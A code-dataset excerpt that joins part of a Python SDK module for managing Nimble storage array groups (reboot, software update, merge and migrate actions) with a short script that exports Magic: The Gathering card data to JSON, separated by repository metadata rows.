resource_type = "groups"
def reboot(self, id, **kwargs):
"""Reboot all arrays in the group.
# Parameters
id : ID of the group to reboot.
job_timeout: Job timeout in seconds.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'reboot',
id=id,
**kwargs
)
def halt(self, id, **kwargs):
"""Halt all arrays in the group.
# Parameters
id : ID of the group to halt.
force : Halt remaining arrays when one or more is unreachable.
job_timeout: Job timeout in seconds.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'halt',
id=id,
**kwargs
)
def test_alert(self, id, level, **kwargs):
"""Generate a test alert.
# Parameters
id : ID of the group.
level : Level of the test alert.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'test_alert',
id=id,
level=level,
**kwargs
)
def software_update_precheck(self, id, **kwargs):
"""Run software update precheck.
# Parameters
id : ID of the group.
skip_precheck_mask : Flag to allow skipping certain types of prechecks.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_update_precheck',
id=id,
**kwargs
)
def software_update_start(self, id, **kwargs):
"""Update the group software to the downloaded version.
# Parameters
id : ID of the group.
skip_start_check_mask : Flag to allow skipping certain types of checks.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_update_start',
id=id,
**kwargs
)
def software_download(self, id, version, **kwargs):
"""Download software update package.
# Parameters
id : ID of the group.
version : Version string to download.
force : Flag to force download.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_download',
id=id,
version=version,
**kwargs
)
def software_cancel_download(self, id, **kwargs):
"""Cancel ongoing download of software.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_cancel_download',
id=id,
**kwargs
)
def software_update_resume(self, id, **kwargs):
"""Resume stopped software update.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_update_resume',
id=id,
**kwargs
)
def get_group_discovered_list(self, id, **kwargs):
"""Get list of discovered groups with arrays that are initialized.
# Parameters
id : ID of the group.
group_name : Name of the group requested to be discovered.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'get_group_discovered_list',
id=id,
**kwargs
)
def validate_merge(self, id, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge validation.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'validate_merge',
id=id,
src_group_ip=src_group_ip,
src_group_name=src_group_name,
src_password=src_password,
src_username=src_username,
**kwargs
)
def merge(self, id, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge with the specified group.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
force : Ignore warnings and forcibly merge specified group with this group.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
job_timeout : Job timeout in seconds.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'merge',
id=id,
src_group_ip=src_group_ip,
src_group_name=src_group_name,
src_password=src_password,
src_username=src_username,
**kwargs
)
def get_eula(self, id, **kwargs):
"""Get URL to download EULA contents.
# Parameters
id : ID of the group.
locale : Locale of EULA contents. Default is en.
format : Format of EULA contents. Default is HTML.
phase : Phase of EULA contents. Default is setup.
force : Flag to force EULA.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'get_eula',
id=id,
**kwargs
)
def check_migrate(self, id, **kwargs):
"""Check if the group Management Service can be migrated to the group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'check_migrate',
id=id,
**kwargs
)
def migrate(self, id, **kwargs):
"""Migrate the group Management Service to the current group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'migrate',
id=id,
**kwargs
)
def get_timezone_list(self, id, **kwargs):
"""Get list of group timezones.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'get_timezone_list',
id=id,
**kwargs
)
def create(self, **kwargs):
raise NimOSAPIOperationUnsupported("create operation not supported")
def delete(self, **kwargs):
raise NimOSAPIOperationUnsupported("delete operation not supported")
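# --- Illustrative usage sketch (not part of the original SDK module) ---
# A minimal example of driving the merge workflow exposed by the Group/GroupList
# classes above. The NimOSClient entry point, its constructor signature, and
# api.groups.get() returning the single group object are assumptions based on
# the conventions of the surrounding SDK, not verified API facts; treat this as
# a hedged sketch only. The keyword arguments match the merge()/validate_merge()
# signatures defined above.
def _example_group_merge(host, username, password,
                         src_ip, src_name, src_user, src_password):
    from nimbleclient import NimOSClient  # assumed client entry point
    api = NimOSClient(host, username, password)
    group = api.groups.get()  # an array group exposes exactly one group object
    # Validate the merge first; only proceed if validation does not raise.
    group.validate_merge(src_group_ip=src_ip, src_group_name=src_name,
                         src_password=src_password, src_username=src_user)
    # Perform the actual merge, allowing up to 10 minutes for the job.
    return group.merge(src_group_ip=src_ip, src_group_name=src_name,
                       src_password=src_password, src_username=src_user,
                       job_timeout=600)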
| 44.5759
| 179
| 0.584082
| 28,232
| 0.991118
| 0
| 0
| 0
| 0
| 0
| 0
| 21,502
| 0.754853
|
ce02069f82a4f0531c7597c44775348bc1d10f18
| 309
|
py
|
Python
|
sdk_client/scripts/cards2json.py
|
victorlacorte/MTG-SDK-Client
|
33fdbfbf545e9f3961369b123a2f7fe783ce8f12
|
[
"DOC"
] | null | null | null |
sdk_client/scripts/cards2json.py
|
victorlacorte/MTG-SDK-Client
|
33fdbfbf545e9f3961369b123a2f7fe783ce8f12
|
[
"DOC"
] | null | null | null |
sdk_client/scripts/cards2json.py
|
victorlacorte/MTG-SDK-Client
|
33fdbfbf545e9f3961369b123a2f7fe783ce8f12
|
[
"DOC"
] | null | null | null |
import json
import mtgsdk as mtg
# Set codes to export; 'grn' is Guilds of Ravnica.
magic_sets = ('grn',)
def main():
    # Fetch every card of each configured set via mtgsdk and dump the cards'
    # attribute dicts to a pretty-printed JSON fixture under tests/data/.
    for s in magic_sets:
        cards = [vars(c) for c in mtg.Card.where(set=s).all()]
        with open(f'tests/data/{s}.json', 'w') as f:
            json.dump(cards, f, indent=4, sort_keys=True)
if __name__ == '__main__':
main()
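# --- Illustrative companion sketch (not part of the original script) ---
# Shows how the fixtures written by main() could be read back, e.g. from a
# test. The tests/data/<set>.json path simply mirrors the writer above; the
# helper name and any downstream field access are hypothetical.
def load_cards(set_code):
    """Return the list of card dicts previously dumped for the given set."""
    with open(f'tests/data/{set_code}.json') as f:
        return json.load(f)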
| 19.3125
| 62
| 0.585761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.12945
|